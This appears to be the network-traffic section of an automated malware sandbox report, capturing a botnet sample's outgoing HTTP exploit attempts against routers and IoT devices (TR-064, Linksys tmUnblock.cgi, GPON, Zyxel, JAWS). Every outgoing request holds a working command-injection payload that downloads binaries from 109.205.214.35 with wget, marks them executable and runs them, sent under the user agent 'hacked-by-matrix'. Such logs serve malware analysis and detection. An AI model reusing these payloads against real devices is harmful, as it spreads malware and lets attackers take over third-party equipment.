                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1643192.168.2.1341614222.117.31.1317547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:29.115565062 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:30.829240084 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1644192.168.2.1344900174.20.41.147547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:29.207920074 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:29.332145929 CET132INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        Date: Thu 21 Mar 2024 04:23:29 UTC
                                                        Server: lighttpd
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1645192.168.2.135923024.247.160.2347547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:29.214149952 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1646192.168.2.1358242172.114.196.858080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:29.266875982 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:30.189925909 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:31.244237900 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:33.548237085 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:37.900243044 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:46.348213911 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1647192.168.2.1333084172.66.140.1648080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:29.354021072 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:29.633632898 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1648192.168.2.1358248172.114.196.858080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:29.463927984 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:30.476241112 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:31.692214966 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:34.316261053 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:39.180243969 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:48.908237934 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1649192.168.2.1352916172.65.240.5655555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:29.476167917 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1650192.168.2.1342350138.99.146.18780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:29.486253023 CET325OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
                                                        Mar 21, 2024 05:23:29.619504929 CET355INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.14.0 (Ubuntu)
                                                        Date: Thu, 21 Mar 2024 04:23:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 182
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1651192.168.2.1344346172.253.28.19955555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:29.492763996 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1652192.168.2.1341688222.117.31.1317547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:30.468997955 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1653192.168.2.1345912172.65.154.9455555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:30.511959076 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1654192.168.2.1345334200.88.44.25380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:30.536036015 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:30.717948914 CET337INHTTP/1.1 200 OK
                                                        Content-Type:text/html; charset=UTF-8
                                                        Pragma:no-cache
                                                        Cache-control:no-cache, no-store, max-age=0
                                                        Transfer-Encoding:chunked
                                                        X-Frame-Options:SAMEORIGIN
                                                        Connection:Keep-Alive
                                                        X-XSS-Protection:1; mode=block
                                                        Content-Security-Policy:default-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                        Content-Language:en
                                                        Mar 21, 2024 05:23:30.718084097 CET1286INData Raw: 64 33 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33
                                                        Data Ascii: d37<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=ut
                                                        Mar 21, 2024 05:23:30.718097925 CET1286INData Raw: 29 20 3d 3d 20 27 3a 27 29 29 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 7d 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 4c 69 73 74 20 3d 20 41 64 64 72 65 73 73 2e 73 70 6c 69
                                                        Data Ascii: ) == ':')) { return false; } List = Address.split(":"); if (List.length > 8) { return false; } for (var i = 0; i < List.length; i++) { if (false == IsIPv6AddressUsh
                                                        Mar 21, 2024 05:23:30.718111038 CET859INData Raw: 65 6c 73 65 0d 0a 7b 0d 0a 76 61 72 20 4c 69 73 74 20 3d 20 48 6f 73 74 49 6e 66 6f 2e 73 70 6c 69 74 28 22 3a 22 29 3b 0d 0a 69 66 28 4c 69 73 74 2e 6c 65 6e 67 74 68 20 3e 3d 20 33 29 0d 0a 7b 0d 0a 2f 2a 20 69 6e 63 6c 75 64 65 20 74 77 6f 20
                                                        Data Ascii: else{var List = HostInfo.split(":");if(List.length >= 3){/* include two or more than two ":" */if(true == IsIPv6AddressValid(HostInfo)){/* host string not include port */window.location="https://[" + HostInfo + "]:" + SSLPort


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1655192.168.2.1342356172.65.153.1668080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:30.561197996 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1656192.168.2.1359750172.65.68.1888080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:30.561273098 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1657192.168.2.134007498.183.155.358080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:30.612741947 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:31.308238029 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1658192.168.2.1341782172.105.175.578080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:30.770775080 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:31.213006020 CET115INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close
                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: 400 Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1659192.168.2.1332842172.67.99.438080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:30.822323084 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1660192.168.2.1351434104.73.71.5480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:30.963524103 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:31.821595907 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:31.984935045 CET437INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 215
                                                        Expires: Thu, 21 Mar 2024 04:23:31 GMT
                                                        Date: Thu, 21 Mar 2024 04:23:31 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 37 26 23 34 36 3b 65 38 61 37 38 36 38 26 23 34 36 3b 31 37 31 30 39 39 35 30 31 31 26 23 34 36 3b 30 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>Reference&#32;&#35;7&#46;e8a7868&#46;1710995011&#46;0</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1661192.168.2.136049044.231.141.7180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:30.973998070 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1662192.168.2.134839269.30.253.12580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:31.319066048 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:32.172221899 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:32.324109077 CET449INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:32 GMT
                                                        Server: Apache/2.4.52 (Unix) OpenSSL/1.0.2k-fips PHP/7.3.33
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
